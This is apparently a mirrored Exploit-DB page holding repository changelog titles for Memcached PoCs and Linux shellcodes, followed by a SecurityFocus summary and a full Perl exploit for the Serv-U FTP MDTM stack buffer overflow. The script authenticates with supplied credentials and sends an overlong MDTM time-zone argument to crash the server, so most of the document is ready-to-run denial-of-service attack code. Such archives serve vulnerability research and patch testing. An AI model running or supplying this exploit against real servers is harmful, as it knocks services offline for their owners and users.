exploit-db-mirror/exploits/windows/dos/23760.pl
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

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Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

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Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

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source: https://www.securityfocus.com/bid/9751/info
Serv-U FTP Server has been reported prone to a remote stack based buffer overflow vulnerability when handling time zone arguments passed to the MDTM FTP command.
The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.
## Coded by saintjmf
## This exploits Serv-u MDTM buffer overflow - Shutsdown server
## Discovered by bkbll - Info provided by securityfocus
## For exploit to work you need valid username and password
## I do not take responsibility for the use of this code
use IO::Socket qw(:DEFAULT :crlf);
print "Serv-u MDTM Buffer overflow - by saintjmf\n";
## Get Host port unsername and password
my $host = shift || die print "\nUsage: <program> <Host> <port> <username> <password>\n";
my $port = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
$username = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
$password = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
## Create Socket
my $socket = IO::Socket::INET->new("$host:$port") or die print "\nUnable to connect -- $!\n";
print "connecting...............\n\n";
connecter($socket);
print "Server should be stopped\n";
## Sub that sends username, password and exploit
sub connecter{
$/ = CRLF;
my $socket2 = shift;
my $message2 = <$socket2>;
chomp $message2;
print "$message2\n";
sleep(5);
print $socket2 "user $username",CRLF;
$message2 = <$socket2>;
chomp $message2;
print "$message2\n";
sleep (5);
print $socket2 "pass $password", CRLF;
$message2 = <$socket2>;
chomp $message2;
print "$message2\n";
sleep (4);
print "Sending MDTM Overflow.....\n";
print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF;
}